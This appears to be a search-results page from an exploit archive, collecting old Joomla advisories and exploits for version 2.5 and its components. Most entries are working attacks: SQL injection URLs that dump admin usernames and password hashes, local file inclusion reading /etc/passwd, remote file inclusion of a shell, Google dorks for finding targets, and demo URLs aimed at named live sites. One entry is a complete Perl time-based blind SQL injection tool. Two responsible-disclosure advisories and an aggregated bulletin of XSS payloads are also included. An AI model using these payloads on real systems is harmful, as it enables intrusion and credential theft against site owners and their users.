joomla 2.5
Search result for 'joomla 2.5'
Jakub Galczyk/Joomla 2.5.3 Information Disclosure ( na)
[ TITLE ....... ][ Joomla 2.5.3 information disclosure (tested for admin)
[ DATE ........ ][ 01.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://joomla.org
[ VERSION ..... ][ 2.5.3
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is information disclosure bug for admin logged-in.
[--------------------------------------------[
[ 3. Where is bug :)
http://your.joomla/administrator/index.php?option=com_modules&view=positions&layout=modal&tmpl=component&function=jSelectPosition_jform_position&client_id=8%27];][][]%3E???%3E./8
Vulnerable parameter is client_id but "output" with information (disclosure bug) is available only in HTML source (so right-click, and view source for 'invalid' string to get information where Joomla is installed on remote server).
By the way: You can set this parameter to non-existent ID (for example 11111111111). You should get the same response (in source, search for 'invalid').
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.joomla.org
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ All questions about new projects @ mail now :) ]
[ Best regards
[
Joomla version 2.5.3 suffers from an information disclosure vulnerability.
wishnusakti/Joomla Agora 2.5.x Pantheon Local File Inclusion ( na)
================================================================================================
Title : Joomla Component Agora (com_agora) LFI Vulnerability
Vendor : http://jvital.com
Download : http://jvitals.com/downloads/file/101-agora-pantheon
Version : 2.5.x Pantheon
Date : Sunday, July 4 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te
Contact : wishnusakti[at]gmail.com
================================================================================================
[+] Vulnerable
<?php
// Vulnerable as published: a single, non-recursive str_replace() of '../'
// is not a sufficient path filter (it runs once, so nested sequences survive),
// and the resulting value is still passed straight into require().
$task = trim( JRequest::getVar('task', "") );
$task = str_replace( '../', '', $task );
if ($task)
{
    require (AGORA_ROOT . "$task.php");
}
else
{
    require ($agora_path . "/index.php");
}
[+] Exploit
http://[site]/[path]/index.php?option=com_agora&task=[LFI]
[+] PoC
http://localhost/index.php?option=com_agora&task=....//....//....//....//....//....//....//....//..../etc/passwd%0000
================================================================================================
Very Special thanks :
The residents of the priv8 server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot² Scan :D)
and all the hacking communities of the homeland
Peace Yo :)
to all my friends :
cakill, aurell, hafiz, xco, xshadow,
gblack, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti + inc0mp13te
The Joomla Agora component version 2.5.x Pantheon suffers from a local file inclusion vulnerability.
Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload ( na)
# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability
# Google Dork: inurl:/components/com_civicrm/
# Date: 08/22/2012
# Author: Crim3R
# download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/
# Tested on: all
==================================
D3m0:
http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html
http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
Joomla versions 1.7 and 2.5 suffer from an arbitrary file upload vulnerability in the Civicrm component.
cO2/Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability ( php)
##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~] Version() : '2.5.8 '
###########################################
#
# DORK 1 : inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################
side note:
<name>alphacontent</name>
<creationDate>25 Jul 2007</creationDate>
<author>Bernard Gilly</author>
<copyright>This component is released under the GNU/GPL License.</copyright>
<authorEmail>contact@visualclinic.fr</authorEmail>
<authorUrl>www.visualclinic.fr</authorUrl>
<version>2.5.8</version>
<description>Directory component with alphabetical indexes for Joomla's Content</description>
<name>alphacontent</name>
<creationDate>16 Sept 2006</creationDate>
<author>Bernard Gilly</author>
<copyright>This component is released under the GNU/GPL License.</copyright>
<authorEmail>contact@visualclinic.fr</authorEmail>
<authorUrl>www.visualclinic.fr</authorUrl>
<version>2.5.4</version>
<description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description>
# milw0rm.com [2008-03-25]
mdx/Joomla Flash uploader 2.5.1 Remote File Inclusion Vulnerabilities ( php)
--------------------------------------------
= = = Mdx (c) 2007 = = =
--------------------------------------------
= = = Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2 = =
============================================
= = Download: = =
http://download.joomlaportal.ch/content/view/1060/
============================================
= = Exploit: =
administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
============================================
= = = Happy Eid to the whole Islamic world = =
============================================
Thanks : Xoron,Deltaforce,Nizam-ül Mülk, Prime Suspect,CyberEx,mith,n0th!ng,CwPeker,Cyber_cobra,CyberWar,Musty @zr@il-,DaRKToLe,ultrAslan_CW,quantumhalil,schevko ,nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554,WarriorHacker cepuzmani_53,kalaba,Dr.X
---------------------------------------
# milw0rm.com [2007-10-11]
S@BUN/Mambo Component AkoGallery 2.5b SQL Injection Vulnerability ( php)
#########################################################################
#
# joomla SQL Injection(com_akogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_akogallery"
#
########################################################################
EXPLOIT :
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
<name>akogallery</name>
<creationDate>21.06.2004</creationDate>
<author>Arthur Konze</author>
<copyright>Copyright 2003, 2004 by Arthur Konze. Distribution prohibited!</copyright>
<authorEmail>webmaster@mamboportal.com</authorEmail>
<authorUrl>www.mamboportal.com</authorUrl>
<version>2.5 beta</version>
<description>AkoGallery is a fully integrated Mambo picture gallery component.</description>
# milw0rm.com [2008-01-31]
S@BUN/joomlaako-sql.txt ( na)
The Joomla com_akogallery component version 2.5b suffers from a remote SQL injection vulnerability.
Alejandro Ramos/Joomla Time Based SQL Injection ( na)
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzzz_users to the previous SQL query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$lenoflen = $_;
last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
my $c=8;
@byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
$stime = time();
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$byte[$c]="0";
} else { $byte[$c]="1"; }
$c--;
}
$str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
Joomla versions less than 2.5.1 time based SQL injection exploit.
mdx/joomlaflup-rfi.txt ( na)
Joomla Flash uploader version 2.5.1 is susceptible to remote file inclusion vulnerabilities.
c02/joomlaalphacon-sql.txt ( na)
The Joomla AlphaContent component versions 2.5.8 and below suffer from a SQL injection vulnerability.
/russian-multi.txt ( na)
Dear bugtraq@securityfocus.com,
Vulnerabilities reported by different Russian speaking authors to
http://securityvulns.ru
1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4
and 5.
disable_functions feature can be bypassed by using functions alias. A
list of aliases is given in http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.
SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html
2. MustLive reports Cross-Site Scripting vulnerability in WordPress
MultiUser 1.0
XSS is possible via Username form field.
Additional information (in Ukrainian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html
3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5
Example:
http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
Original message (in Russian): http://securityvulns.ru/Rdocument901.html
4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13
An example of vulnerability is
http://site/index.php?option=com_search&searchword=';alert('XSS')//
Additional information (in Ukrainian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html
5. durito [NGH Group] reports cross-site scripting vulnerability in
ActiveKB NX 2.5.4
Example: http://www.example.com/activekb/ActiveKB/?page=[XSS]
Original message (in Russian): http://securityvulns.ru/Rdocument956.html
6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)
Vulnerability example:
http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();
Original message (in Russian): http://securityvulns.ru/Rdocument957.html
7. MustLive reports cross-site scripting vulnerability in Nucleus.
Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukrainian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html
8. durito [NGH Group] reports
8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:
Content Management System
http://www.example.com/main.php?p=[SQL]
Merchant
http://www.example.com/shop.php?cmd=sto&id=[SQL]
Courses
http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]
8.2 Information leak (FTP access account) with MyFTPUploader within
same applications. Example:
http://www.example.com/include/imageupload.js
contains
document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');
8.3 Default administrator's password for same applications.
Original message (in Russian): http://securityvulns.ru/Sdocument4.html
9. MustLive reports multiple cross-site scripting vulnerabilities in
Site-Up <= 2.64
Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:
Additional information (in Ukrainian): http://websecurity.com.ua/1210/
Original message (in Russian): http://securityvulns.ru/Sdocument12.html
10. MustLive reports cross-site scripting in Google Search Appliance.
Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'
Additional information (in Ukrainian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html
10. MustLive reports cross-site scripting in PRO-search
Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukrainian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html
10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is also
authentication bypass (access without username/password).
Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5
Additional information (in Ukrainian): http://websecurity.com.ua/1283/
Original message (in Russian): http://securityvulns.ru/Sdocument90.html
11. MustLive reports cross-site scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URL if page content is displayed as
UTF-7. Examples:
For Firefox before 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
For Firefox 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
According to the author, it's possible to execute script in both local zone
and context of gopher site.
12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.
Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
Original message (in Russian): http://securityvulns.ru/Sdocument137.html
13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.
Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.
kaMtiEz/Joomla DMS SQL Injection ( na)
/**************************************************************************
[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 28 January, 2010
**************************************************************************/
[ Software Information ]
[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================
[ Vulnerable File ]
http://127.0.0.1//index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
[ Demo ]
http://dms.joomdonation.com/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Dad, Mom, little sibling, I love you all ..
[+] Make love with all your might!
[+] rm -rf
[ QUOTE ]
[+] we are not dead INDONESIANCODER still r0x
[+] nothing secure ..
The Joomla DMS component suffers from a remote SQL injection vulnerability.
AtT4CKxT3rR0r1ST/Joomla Pony Gallery Remote File Inclusion ( na)
Joomla Component com_ponygallery Multiple Remote File Include
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,2874/chk,9056372cb7b40c9809ba7070ffde09f3/no_html,1/fname,PONYGALLERY_ML_2_5_1_INSTALL.zip.html
.:. Dork : inurl:"com_ponygallery"
####################################################################
===[ Exploit ]===
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
####################################################################
The Joomla Pony Gallery component suffers from a remote file inclusion vulnerability.
EgiX/Joomla! 3.0.2 PHP Object Injection ( na)
-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/highlight/highlight.php:
56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;
User input passed through the "highlight" parameter is not properly sanitized before being used in
an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the
application scope. Successful exploitation of this vulnerability doesn't require authentication,
but requires the "System Highlight" plugin to be enabled (as it is in the default configuration).
[-] Solution:
Upgrade to version 3.0.3 or 2.5.9.
[-] Disclosure Timeline:
[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1453 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-03
Joomla! versions 3.0.2 and below suffer from a PHP object injection vulnerability in highlight.php.
EgiX/Joomla! 3.0.3 PHP Object Injection ( na)
------------------------------------------------------------------
Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability
------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.3 and earlier 3.0.x versions.
Version 2.5.9 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/remember/remember.php:
34. $hash = JApplication::getHash('JLOGIN_REMEMBER');
35.
36. if ($str = JRequest::getString($hash, '', 'cookie', JREQUEST_ALLOWRAW | JREQUEST_NOTRIM))
37. {
38. // Create the encryption key, apply extra hardening using the user agent string.
39. // Since we're decoding, no UA validity check is required.
40. $privateKey = JApplication::getHash(@$_SERVER['HTTP_USER_AGENT']);
41.
42. $key = new JCryptKey('simple', $privateKey, $privateKey);
43. $crypt = new JCrypt(new JCryptCipherSimple, $key);
44. $str = $crypt->decrypt($str);
45. $cookieData = @unserialize($str);
User input passed through cookies is not properly sanitized before being used in an unserialize()
call at line 45. This could be exploited to inject arbitrary PHP objects into the application scope.
Successful exploitation of this vulnerability requires authentication because the attacker needs
to know the "hash string" used to read the cookie parameter at line 36.
[-] Solution:
Upgrade to version 2.5.10, 3.0.4 or 3.1.0.
[-] Disclosure Timeline:
[04/12/2012] - Vendor alerted for a possible vulnerability
[13/02/2013] - Vulnerability confirmed and proof of concept sent to the vendor
[24/04/2013] - Vendor update released
[26/04/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3242 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-04
Joomla! versions 3.0.3 and below suffer from a PHP object injection vulnerability in remember.php.